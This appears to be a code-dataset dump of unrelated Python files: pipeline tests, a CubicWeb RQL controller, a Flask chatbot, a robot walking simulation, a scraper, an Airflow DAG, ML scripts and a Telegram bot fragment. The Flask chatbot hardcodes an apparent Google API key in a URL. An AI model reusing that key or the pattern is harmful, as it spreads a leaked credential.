raise AssertionError()\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['noob_unmeth'], 4480.919922):\n raise AssertionError()\n\n @staticmethod\n def test_run_pipeline_export_data():\n \"\"\" check that we get back useful data with --export option \"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n testfile_1 = Path(test_data_dir, '9247377093', '9247377093_R02C01_processed.csv')\n testfile_2 = Path(test_data_dir, '9247377085', '9247377085_R04C02_processed.csv')\n if testfile_1.exists():\n testfile_1.unlink()\n if testfile_2.exists():\n testfile_2.unlink()\n test_data_containers = pipeline.run_pipeline(test_data_dir, export=True)\n if not testfile_1.exists():\n raise AssertionError(\"no exported processed csv found\")\n\n test1 = pd.read_csv(testfile_1)\n if test1['beta_value'].isna().sum() > 0:\n print(test1.head())\n raise AssertionError('missing values in processed csv')\n test2 = pd.read_csv(testfile_2)\n if test2['beta_value'].isna().sum() > 0:\n print(test2.head())\n raise AssertionError('missing values in processed csv')\n\n # spot checking the output.\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['beta_value'], 0.30799999):\n print(test_data_containers[1]._SampleDataContainer__data_frame)\n raise AssertionError(f\"{test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['beta_value']} vs {0.30799999}\")\n # spot checking the output.\n total_nas = test_data_containers[0]._SampleDataContainer__data_frame['beta_value'].isna().sum()\n if total_nas > 0:\n print(f'found {total_nas} missing beta_values (N/A or inf) in sample')\n raise AssertionError()\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[3]['noob_meth'], 3811.0):\n raise AssertionError(f\"{test_data_containers[1]._SampleDataContainer__data_frame.iloc[3]['noob_meth']} vs 
{3811.162109}\")\n\n @staticmethod\n def test_run_pipeline_epic_plus_export_data():\n \"\"\" check that we get back useful data with --export option \"\"\"\n test_data_dir = 'docs/example_data/epic_plus'\n testfile_1 = Path(test_data_dir, '202651080072', '202651080072_R01C01_processed.csv')\n if testfile_1.exists():\n testfile_1.unlink()\n test_data_containers = pipeline.run_pipeline(test_data_dir, export=True)\n if not testfile_1.exists():\n raise AssertionError(\"no exported processed csv found\")\n\n # spot checking the output.\n test1 = pd.read_csv(testfile_1)\n num_missing = test1['beta_value'].isna().sum()\n if num_missing == 1:\n if test1[test1.beta_value.isna()]['IlmnID'].iloc[0] == 'cg00968771_I_F_C_rep1_GWG1':\n print(\"WARNING: cg00968771_I_F_C_rep1_GWG1 probe data is STILL missing from output\")\n #NOT A FATAL ERROR. but not fixing today.\n elif num_missing > 0:\n print(test1.head())\n raise AssertionError('{num_missing} missing values in processed csv')\n if not np.isclose(test1['beta_value'].iloc[5], 0.145):\n print(test1.iloc[5])\n raise AssertionError('beta_value doesnt match expected value')\n if not np.isclose(test_data_containers[0]._SampleDataContainer__data_frame.iloc[2]['noob_unmeth'], 284.0):\n print(test_data_containers[0]._SampleDataContainer__data_frame)\n raise AssertionError(f\"data_container output ({test_data_containers[0]._SampleDataContainer__data_frame.iloc[2]['noob_unmeth']}) differs from expected value (284.0)\")\n","sub_path":"tests/processing/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589188945","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nspanti/workspace/rqlcontroller/cubicweb_rqlcontroller/views.py\n# Compiled at: 2020-03-20 10:33:28\n# Size of source mod 2**32: 6343 bytes\n\"\"\"cubicweb-rqlcontroller views/forms/actions/components for web ui\"\"\"\nimport json, re\nfrom six import string_types\nfrom cubicweb.predicates import ExpectedValuePredicate, match_form_params, match_http_method\nfrom cubicweb.uilib import exc_message\nfrom cubicweb.utils import json_dumps\nfrom cubicweb.web import RemoteCallFailed, DirectResponse\nfrom cubicweb.web.controller import Controller\nfrom cubicweb.web.views.urlrewrite import rgx_action, SchemaBasedRewriter\nfrom cubicweb import Binary\nARGRE = re.compile('__r(?P\\\\d+)$')\nDATARE = re.compile('__f(?P.+)$')\n\ndef rewrite_args(args, output, form):\n for k, v in args.items():\n if not isinstance(v, string_types):\n continue\n match = ARGRE.match(v)\n if match:\n numref = int(match.group('ref'))\n if 0 <= numref <= len(output):\n rset = output[numref]\n if not rset:\n raise Exception('%s references empty result set %s' % (\n v, rset))\n if len(rset) > 1:\n raise Exception('%s references multi lines result set %s' % (\n v, rset))\n row = rset.rows[0]\n if len(row) > 1:\n raise Exception('%s references multi column result set %s' % (v, rset))\n args[k] = row[0]\n continue\n match = DATARE.match(v)\n if match:\n args[k] = Binary(form[v][1].read())\n\n\nclass match_request_content_type(ExpectedValuePredicate):\n __doc__ = 'check that the request body has the right content type'\n\n def _get_value(self, cls, req, **kwargs):\n header = req.get_header('Content-Type', None)\n if header is not None:\n header = header.split(';', 1)[0].strip()\n 
return header\n\n\nclass RqlIOController(Controller):\n __doc__ = "posted rql queries and arguments use the following pattern:\\n\\n [('INSERT CWUser U: U login %(login)s, U upassword %(pw)s',\\n {'login': 'babar', 'pw': 'cubicweb rulez & 42'}),\\n ('INSERT CWGroup G: G name %(name)s',\\n {'name': 'pachyderms'}),\\n ('SET U in_group G WHERE G eid %(g)s, U eid %(u)s',\\n {'u': '__r0', 'g': '__r1'}),\\n ('INSERT File F: F data %(content)s, F data_name %(fname)s',\\n {'content': '__f0', 'fname': 'toto.txt'}),\\n ]\\n\\n The latter query is an example of a query built to upload binary\\n data as a file object. It requires a multipart query\\n in which there is a part holding a file named '__f0'. See\\n cwclientlib for examples of such queries.\\n\\n Limitations: back references can only work if one entity has been\\n created.\\n\\n "\n __regid__ = 'rqlio'\n __select__ = match_http_method('POST') & match_request_content_type('application/json', 'multipart/form-data', mode='any') & match_form_params('version')\n\n def json(self):\n contenttype = self._cw.get_header('Content-Type', raw=False)\n if (contenttype.mediaType, contenttype.mediaSubtype) == ('application', 'json'):\n encoding = contenttype.params.get('charset', 'utf-8')\n content = self._cw.content\n else:\n encoding = 'utf-8'\n content = self._cw.form['json'][1]\n try:\n args = json.loads(content.read().decode(encoding))\n except ValueError as exc:\n raise RemoteCallFailed(exc_message(exc, self._cw.encoding))\n\n if not isinstance(args, (list, tuple)):\n args = (args,)\n return args\n\n def publish(self, rset=None):\n self._cw.ajax_request = True\n self._cw.set_content_type('application/json')\n version = self._cw.form['version']\n if version not in ('1.0', '2.0'):\n raise RemoteCallFailed('unknown rqlio version %r', version)\n args = self.json()\n try:\n result = self.rqlio(version, *args)\n except (RemoteCallFailed, DirectResponse):\n raise\n except Exception as exc:\n raise RemoteCallFailed(exc_message(exc, self._cw.encoding))\n\n if result is None:\n return b''\n return json_dumps(result).encode(self._cw.encoding)\n\n def rqlio(self, version, *rql_args):\n try:\n output = self._rqlio(rql_args)\n except Exception:\n self._cw.cnx.rollback()\n raise\n else:\n self._cw.cnx.commit()\n if version == '2.0':\n return [{'rows':o.rows, 'variables':o.variables} for o in output]\n return [o.rows for o in output]\n\n def _rqlio(self, rql_args):\n output = []\n for rql, args in rql_args:\n if args is None:\n args = {}\n rewrite_args(args, output, self._cw.form)\n output.append(self._cw.execute(rql, args))\n\n return output\n\n\nclass RQLIORewriter(SchemaBasedRewriter):\n rules = [\n (\n re.compile('/rqlio/(?P<version>.+)$'),\n rgx_action(controller='rqlio', formgroups=('version', )))]","sub_path":"pycfiles/cubicweb-rqlcontroller-0.6.0.tar/views.cpython-37.py","file_name":"views.cpython-37.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133017752","text":"from flask import Flask, render_template,request,make_response,jsonify\nimport json\nfrom urllib.request import urlopen\n\nfrom webScraper import webScraper\nfrom nlp import nlp\nfrom controller import controller\n\n\n\n#Create flask shell\napp = Flask(__name__)\n\n# Initialize components (Controller, Reasoning Engine, Language Processing)\nnlp = nlp.ReasoningEngine()\ncontroller = 
controller.ConversationController(nlp)\n\n\n\n\n\n########################################################################\n#\n# Routes and Logic\n#\n\n# Initial SplashScreen\n@app.route(\"/\")\ndef index():\n\n # get users location on index page\n url = 'http://ipinfo.io/json'\n response = urlopen(url)\n data = json.load(response)\n city = data['city']\n loc = data['loc']\n print(\"Detected user city as \" + city + \" (\" + loc + \")\")\n\n # get nearest train station with google places api\n # coords format = 45.77940539999999%2C15.9516292\n locsplit = loc.split(',')\n coords = locsplit[0] + \"%2C\" + locsplit[1]\n g_url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='+coords+'&rankby=distance&type=train_station&key=AIzaSyCcTgfahn0CZbas24XqkKJbGd9n73_H_pE'\n g_response = urlopen(g_url)\n g_data = json.load(g_response)\n nearest_station = g_data['results'][0]['name']\n print(\"Nearest station (thanks Google) is \" + nearest_station)\n\n # render page\n return render_template('index.html')\n\n# Endpoint for communication... recieving and sending responses\n@app.route(\"/chat\", methods=['POST'])\ndef chat():\n #Read in userInput as string\n userInput = request.get_json()['userMessage']\n\n # Pass the user input to the controller : respond deals with connection to NLP\n response = controller.respond(userInput)\n\n # Determine if its a normal response or the scraped ticket info\n # Normal response\n if(isinstance(response, str )):\n status = \"ticketChat\" \n # Ticket info (stored in a dict)\n elif(isinstance(response, dict )):\n status = \"ticketInfo\"\n\n\n response = make_response(jsonify({\"answer\": response, \"status\" : status}), 200)\n return response\n \n\n# Chatbot endpoint\n@app.route(\"/chatbot\")\ndef chatbot():\n greet = nlp.get_random_greeting()\n return render_template('chatbot.html', greeting = greet)\n\n#\n############################################################################\n\n#RUN FLASK CHATBOT\napp.run(debug=True)\n","sub_path":"flaskChatbot/flaskChatbot.py","file_name":"flaskChatbot.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"409669957","text":"from gait import *\n\nimport pinocchio as se3\nimport tsid\nimport numpy as np\nimport numpy.matlib as matlib\nfrom numpy import nan\nfrom numpy.linalg import norm as norm\nimport os\nimport gepetto.corbaserver\nimport time\nimport commands\nimport sys\n#sys.path += [os.getcwd()+'/../exercizes']\n#import plot_utils as plut\n#import matplotlib.pyplot as plt\n\ndisplay = True\n\nnp.set_printoptions(precision=3, linewidth=200, suppress=True)\n\nmu = 0.3 # friction coefficient\nfMin = 1.0 # minimum normal force\nfMax = 100.0 # maximum normal force\ncontact_frames = ['BL_contact', 'BR_contact', 'FL_contact', 'FR_contact']\ncontactNormal = np.matrix([0., 0., 1.]).T # direction of the normal to the contact surface\n\nw_com = 1.0 # weight of center of mass task\nw_posture = 1e-3 # weight of joint posture task\nw_forceRef = 1e-5 # weight of force regularization task\n\nkp_contact = 10.0 # proportional gain of contact constraint\nkp_com = 10.0 # proportional gain of center of mass task\nkp_posture = 10.0 # proportional gain of joint posture task\n\ndt = 0.001 # controller time step\nPRINT_N = 500 # print every PRINT_N time steps\nDISPLAY_N = 25 # update robot configuration in viwewer every DISPLAY_N time steps\nN_SIMULATION = 6000 # number of time steps simulated\n\ndef AttachContact(name):\n i = 
contact_frames.index(name)\n contacts[i] = tsid.ContactPoint(name, robot, name, contactNormal, mu, fMin, fMax)\n contacts[i].setKp(kp_contact * matlib.ones(3).T)\n contacts[i].setKd(2.0 * np.sqrt(kp_contact) * matlib.ones(3).T)\n H_rf_ref = robot.framePosition(data, robot.model().getFrameId(name))\n contacts[i].setReference(H_rf_ref)\n contacts[i].useLocalFrame(False)\n invdyn.addRigidContact(contacts[i], w_forceRef, 1.0, 1)\n\ndef DetachContact(name):\n invdyn.removeRigidContact(name, 0.1)\n\ndef SetDesiredCom(gait):\n sampleCom.pos(np.matrix([0.0, gait._comLocation, gait.COM_HEIGHT]).T)\n sampleCom.vel(np.matrix([0.0, speed, 0.0]).T)\n sampleCom.acc(np.matrix([0.0, 0.0, 0.0]).T)\n comTask.setReference(sampleCom)\n\ndef SetDesiredJoints(gait):\n pos = matlib.zeros(8).T\n\n pos[0] = gait._contacts[1]._shAngle\n pos[1] = gait._contacts[1]._knAngle\n\n pos[2] = gait._contacts[3]._shAngle\n pos[3] = gait._contacts[3]._knAngle\n\n pos[4] = gait._contacts[2]._shAngle\n pos[5] = gait._contacts[2]._knAngle\n\n pos[6] = gait._contacts[0]._shAngle\n pos[7] = gait._contacts[0]._knAngle\n\n samplePosture.pos(pos)\n postureTask.setReference(samplePosture)\n\n if gait._contacts[0]._justAttached: \n AttachContact('FR_contact')\n if gait._contacts[0]._justDetached: \n DetachContact('FR_contact')\n\n if gait._contacts[1]._justAttached: \n AttachContact('BL_contact')\n if gait._contacts[1]._justDetached: \n DetachContact('BL_contact')\n\n if gait._contacts[2]._justAttached: \n AttachContact('FL_contact')\n if gait._contacts[2]._justDetached: \n DetachContact('FL_contact')\n\n if gait._contacts[3]._justAttached: \n AttachContact('BR_contact')\n if gait._contacts[3]._justDetached: \n DetachContact('BR_contact') \n\n# load urdf\n\nfilename = str(os.path.dirname(os.path.abspath(__file__)))\nos.chdir(filename)\npath = filename + '/../models'\nurdf = path + '/quadruped/urdf/quadruped.urdf'\nvector = se3.StdVec_StdString()\nvector.extend(item for item in path)\nrobot = tsid.RobotWrapper(urdf, vector, se3.JointModelFreeFlyer(), False)\n\n# for gepetto viewer\nrobot_display = se3.RobotWrapper.BuildFromURDF(urdf, [path, ], se3.JointModelFreeFlyer())\nl = commands.getstatusoutput(\"ps aux |grep 'gepetto-gui'|grep -v 'grep'|wc -l\")\nif int(l[1]) == 0:\n os.system('gepetto-gui &')\ntime.sleep(1)\n\nif display:\n cl = gepetto.corbaserver.Client()\n gui = cl.gui\n robot_display.initDisplay(loadModel=True)\n\nq = matlib.zeros(robot.nq).T\n\nq[2] += 0.5\nfor i in range(4):\n q[7 + 2*i] = -0.8\n q[8 + 2*i] = 1.6\n\nv = matlib.zeros(robot.nv).T\n\nif display:\n robot_display.displayCollisions(False)\n robot_display.displayVisuals(True)\n robot_display.display(q)\n\nassert [robot.model().existFrame(name) for name in contact_frames]\n\nt = 0.0 # time\ninvdyn = tsid.InverseDynamicsFormulationAccForce(\"tsid\", robot, False)\ninvdyn.computeProblemData(t, q, v)\ndata = invdyn.data()\n\n# Place the robot onto the ground.\nid_contact = robot_display.model.getFrameId(contact_frames[0])\nq[2] -= robot.framePosition(data, id_contact).translation[2, 0]\nrobot.computeAllTerms(data, q, v)\n\n#sys.exit()\n\ncontacts = 4*[None]\nfor i, name in enumerate(contact_frames):\n AttachContact(name)\n\n# COM task\n\ncomTask = tsid.TaskComEquality(\"task-com\", robot)\ncomTask.setKp(kp_com * matlib.ones(3).T)\ncomTask.setKd(2.0 * np.sqrt(kp_com) * matlib.ones(3).T)\ninvdyn.addMotionTask(comTask, w_com, 1, 0.0)\n\n#region posture task\n\npostureTask = tsid.TaskJointPosture(\"task-posture\", robot)\npostureTask.setKp(kp_posture * 
matlib.ones(robot.nv-6).T)\npostureTask.setKd(2.0 * np.sqrt(kp_posture) * matlib.ones(robot.nv-6).T)\ninvdyn.addMotionTask(postureTask, w_posture, 1, 0.0)\n\ncom_ref = robot.com(data)\ntrajCom = tsid.TrajectoryEuclidianConstant(\"traj_com\", com_ref)\nsampleCom = trajCom.computeNext()\n\nq_ref = q[7:]\ntrajPosture = tsid.TrajectoryEuclidianConstant(\"traj_joint\", q_ref)\nsamplePosture = trajPosture.computeNext()\n\nsolver = tsid.SolverHQuadProgFast(\"qp solver\")\n \nspeed = 0.1\ngait = Gait()\n\nfor i in range(0, N_SIMULATION):\n time_start = time.time()\n\n gait.Tick(t, speed, 0)\n\n SetDesiredCom(gait)\n SetDesiredJoints(gait)\n\n # solve\n\n HQPData = invdyn.computeProblemData(t, q, v)\n #if i == 0: HQPData.print_all()\n\n sol = solver.solve(HQPData)\n if(sol.status!=0):\n print (\"[%d] QP problem could not be solved! Error code:\"%(i), sol.status)\n break\n \n tau = invdyn.getActuatorForces(sol)\n dv = invdyn.getAccelerations(sol)\n\n # if i%PRINT_N == 0:\n # print \"Time %.3f\"%(t)\n # print \"\\tNormal forces: \",\n # for contact in contacts:\n # if invdyn.checkContact(contact.name, sol):\n # f = invdyn.getContactForce(contact.name, sol)\n # print \"%4.1f\"%(contact.getNormalForce(f)),\n\n # print \"\\n\\ttracking err %s: %.3f\"%(comTask.name.ljust(20,'.'), norm(comTask.position_error, 2))\n # print \"\\t||v||: %.3f\\t ||dv||: %.3f\"%(norm(v, 2), norm(dv))\n\n v_mean = v + 0.5*dt*dv\n v += dt*dv\n q = se3.integrate(robot.model(), q, dt*v_mean)\n t += dt\n \n if display and i%DISPLAY_N == 0: robot_display.display(q)\n\n time_spent = time.time() - time_start\n if(time_spent < dt): time.sleep(dt-time_spent)\n\n# 0 - right/left\n# 1 - front/back\n# 2 - down/up\n# ...\n# 7 - LBB\n# 8 - LBK\n# 9 - RBB\n# 10 - RBK\n# 11 - LFB\n# 12 - LFK\n# 13 - RFB\n# 14 - RFK","sub_path":"demo/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226970245","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass PaddypowerComSpider(scrapy.Spider):\n name = 'paddypower_com'\n allowed_domains = ['www.paddypower.com']\n start_urls = ['http://www.paddypower.com/football/euro-football/champions-league']\n\n def start_requests(self):\n for url in self.start_urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n json_data = {}\n\n rdata = response.css('div.fb-sub-content')\n for data in rdata:\n for item in data.css('div.fb-odds-group.item > span.odd'):\n json_data[item.css('span.odds-label::text').extract()[0].strip()\n ] = item.css('span.odds-value::text').extract()[0].strip()\n\n with open(\"{}.json\".format(self.name), 'w') as fj:\n import json\n fj.write(json.dumps(json_data))\n self.log('Saved file %s' % \"{}.json\".format(self.name))\n","sub_path":"build/lib/score_crawl/spiders/paddypower_com.py","file_name":"paddypower_com.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"322715615","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'AirFlow',\n 'start_date': datetime(2015, 6, 1),\n 'retry_delay': timedelta(minutes=5)\n\n}\n\ndef print_context(**context):\n print(datetime.now())\n\ndag = DAG('Exercise2', 
default_args=default_args)\n\nt1 = PythonOperator(\n task_id='print_execution_date',\n provide_context=True,\n python_callable=print_context,\n dag = dag \n)\n\nt2 = BashOperator(\n task_id='wait1',\n bash_command='sleep 1',\n dag = dag \n)\n\nt3 = BashOperator(\n task_id='wait5',\n bash_command='sleep 5',\n dag = dag \n)\n\nt4 = BashOperator(\n task_id='wait10',\n bash_command='sleep 10',\n dag = dag \n)\n\nt5 = DummyOperator(\n task_id='the_end',\n dag = dag \n)\n\nt1 >> [t2, t3, t4] >> t5","sub_path":"dags/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576379046","text":"import threading\ndef run(n):\n print('thread',n)\n\nt_list=[]\nfor i in range(5):\n t=threading.Thread(target=run,args=(i,))\n t.start()\n t_list.append(t) # collect each started thread in the list so we can make sure every child thread has finished\n #print(t_list)\nfor z in t_list:\n z.join() # wait: join makes the main thread wait until the child thread finishes before continuing\n #print('-',z)\nprint('I am the main thread')","sub_path":"untitled1/dream/day-10/线程等待.py","file_name":"线程等待.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"1373583","text":"import json\nfrom google.cloud import firestore\n\ndb = firestore.Client()\n\nwith open('recipes.json', 'r') as json_file:\n c = db.collection('recipes')\n data = json.load(json_file)\n for r in data:\n id = r.pop('Id', None)\n c.add(r, str(id))\n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161467172","text":"from caravel.storage import entities\n\n\ndef test_query_folding():\n expectations = {\n \"is:Foos\": \"is:Foos\",\n \"CaTs\": \"cat\",\n \"e@mails\": \"e@mails\",\n \"[foo\": \"foo\",\n }\n\n for key, value in expectations.items():\n assert entities.fold_query_term(key) == value\n\n\ndef test_properties():\n ent = entities.Listing(\n title=\"Ma Listing\",\n body=\"Body, Text!\",\n seller=\"e@mail\",\n key_name=\"xyz\",\n posting_time=10.0,\n )\n\n assert ent.permalink == \"xyz\"\n assert ent.primary_category == \"category:miscellaneous\"\n ent.categories = [\"category:books\", \"category:cars\"]\n assert ent.primary_category == \"category:books\"\n assert set(ent.keywords) == set([\"ma\", \"listing\", \"body\", \"text\", \"e@mail\",\n \"category:books\", \"category:cars\",\n \"price:free\"])\n","sub_path":"caravel/tests/test_entities.py","file_name":"test_entities.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508153395","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport weekday_field.fields\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Doctor',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, verbose_name='Name')),\n ('weekdays', weekday_field.fields.WeekdayField(max_length=14, verbose_name='Weekdays')),\n ('time_from', models.TimeField(default=datetime.time(9, 0), verbose_name='Time from')),\n ('time_to', models.TimeField(default=datetime.time(18, 0), verbose_name='Time to')),\n ],\n options={\n 'verbose_name': 'Doctor',\n 'verbose_name_plural': 
'Doctors',\n },\n ),\n migrations.CreateModel(\n name='Record',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('patient_name', models.CharField(max_length=255, verbose_name='Full name')),\n ('time', models.DateTimeField(verbose_name='Date and time')),\n ('doctor', models.ForeignKey(to='clinic.Doctor', verbose_name='Doctor')),\n ],\n options={\n 'verbose_name': 'Record',\n 'verbose_name_plural': 'Records',\n },\n ),\n ]\n","sub_path":"clinic/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136196490","text":"import numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.svm import SVC\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\nfrom nltk.corpus import stopwords\nimport os\n\ndef review_to_wordlist( review):\n review_text = BeautifulSoup(review,\"html.parser\").get_text()\n review_text = re.sub(\"[^a-zA-Z]\",\" \", review_text)\n words = review_text.lower().split()\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n return(words)\n\nif __name__ == \"__main__\":\n\ttrainDataPath=os.path.join(os.path.dirname(__file__), 'data', 'labeledTrainData.tsv')\n\ttestDataPath=os.path.join(os.path.dirname(__file__), 'data', 'testData.tsv')\n\n\ttrain = pd.read_csv(trainDataPath, header=0, delimiter=\"\\t\", quoting=3)\n\t#test = pd.read_csv(testDataPath, header=0, delimiter=\"\\t\", quoting=3 )\n\ttest=train[18750:25000]\n\ttrain=train[:18750]\n\n\tclean_train_reviews = []\n\tfor i in range( 0, len(train[\"review\"])):\n\t\tclean_train_reviews.append(\" \".join(review_to_wordlist(train[\"review\"][i])))\n\tprint(\"cleaned train data\")\n\n\tclean_test_reviews = []\n\tfor i in range( 18750, 25000):\n\t\tclean_test_reviews.append(\" \".join(review_to_wordlist(test[\"review\"][i])))\n\tprint(\"cleaned test data\")\n\n\tm_f = 100\n\t\n\tvectorizer = CountVectorizer(analyzer = \"word\", tokenizer = None, preprocessor = None, stop_words = None, max_features = m_f)\n\ttrain_data_features = vectorizer.fit_transform(clean_train_reviews)\n\ttrain_data_features = train_data_features.toarray()\n\tprint(\"tokens for train made\")\n\t\n\t# reuse the vocabulary fitted on the training data; fitting a second vectorizer on the test set would produce inconsistent features\n\ttest_data_features = vectorizer.transform(clean_test_reviews)\n\ttest_data_features = test_data_features.toarray()\n\tprint(\"tokens for test made\")\n\n\tkernel=\"rbf\"\n\tmodel = SVC(kernel=kernel, gamma='auto') \n\tmodel = model.fit( train_data_features, train[\"sentiment\"] )\n\tprint(\"model made\")\n\n\tresult = model.predict(test_data_features)\n\tprint(\"predictions done\")\n\n\toutput = pd.DataFrame( data={\"id\":test[\"id\"], \"sentiment\":result} )\n\toutput.to_csv(\"outputSVM.csv\", index=False, quoting=3 )\n\tprint(\"output file saved as outputSVM.csv\")\n\n\tactual=test[\"sentiment\"]\n\tpredicted=output[\"sentiment\"]\n\ttrue=0.0\n\ttotal=0.0\n\tfor i in range(18750,25000):\n\t\tif(actual[i]==predicted[i]):\n\t\t\ttrue+=1.0\n\t\ttotal+=1.0\n\tprint(\"Accuracy is \"+str(true/total))\n","sub_path":"SVM/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"184662952","text":"from fangzhen_lib.sample_GPR import 
A_GPR\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nimport random\nimport time\nfrom func_model.diatance_trance import time_FS, time_TB\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n\nfrom data.fangzhen_data.func_ND import func_4D\n\n\ndef sample_point(round_xy=None, iter=None, sample_type='uniform'):\n m, n = np.shape(round_xy)\n x_temp = np.zeros((iter, m))\n if sample_type == 'uniform':\n for k in range(iter):\n for i in range(m):\n x_temp[k, i] = np.random.uniform(round_xy[i, 0] + 10e-99, round_xy[i, 1])\n\n elif sample_type == 'linspace':\n for i in range(m):\n x_temp[:, i] = np.linspace(round_xy[i, 0] + 10e-99, round_xy[i, 1], iter)\n\n return x_temp\nf_4d = func_4D()\nx_round = f_4d.round_x\n\nnum_low_data = 10\nx_train_l = sample_point(round_xy=x_round, iter=num_low_data)\ny_train_l = np.reshape([f_4d.f_l(x_train_l[i]) for i in range(num_low_data)], (-1,1))\n\nnum_high_data = 500\nx_data = sample_point(round_xy=x_round, iter=num_high_data)\ny_data = [f_4d.f_obj(x_data[i]) for i in range(num_high_data)]\nx_train, x_test, y_train, y_test = train_test_split(x_data, np.reshape(y_data, (-1, 1)), test_size=0.3)\n\n\n\nm, n = np.shape(x_train)\nprint('total training samples:', m)\nprint('low-fidelity sample count:', np.shape(x_train_l)[0])\n\n\na_gpr = A_GPR()\nrandom_data = 40\nx_data_1 = sample_point(round_xy=x_round, iter=random_data)\ny_data_1 = [f_4d.f_obj(x_data_1[i]) for i in range(random_data)]  # evaluate the points that were actually sampled (x_data_1, not x_data)\n\nmodel = a_gpr.creat_gpr_model(x_data_1, np.reshape(y_data_1, (-1, 1)))\n\ny_pre = [a_gpr.predict_mu_var(np.array(x_test[i], ndmin=2), model, re_var=False) for i in range(np.shape(x_test)[0])]\n\nprint(mean_squared_error(y_test, y_pre))\n","sub_path":"fangzhen_lib/random_point.py","file_name":"random_point.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253480364","text":"vowels = \"aeiouAEIOU\" #storing vowels as a word in variable\n\nuserinput = input(\"Enter a word : \") #storing user input in a variable\n\ncount = 0\nfor i in vowels: #iterating through the word stored in vowels variable\n for j in userinput: #iterating through the word entered by user\n if(i == j): #checking whether any letter matches\n count = count + 1 # Incrementing the count if a letter is matched\nprint(\"No: of Vowels in \" +userinput+ \" is \" + str(count)) #Printing no: of vowels\n\n\n\n","sub_path":"vowelcount.py","file_name":"vowelcount.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"33055670","text":"import const,var\nimport miniflux_client\nimport telegram\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import CallbackQueryHandler\nimport re,threading\n\ndef check_admin(check_id):\n admin_list = var.get('admin_list', [])\n if check_id in admin_list:\n return True\n return False\n\ndef callback_query(bot, update):\n if not check_admin(update.callback_query.from_user.id):\n return\n callback_data = update.callback_query.data\n origin_message_id = update.callback_query.message.message_id\n text = update.callback_query.message.text\n chat_id = update.callback_query.message.chat_id\n args = callback_data.split(',')\n entryid = int(args[1])\n isread = int(args[2])\n isstar = int(args[3])\n 
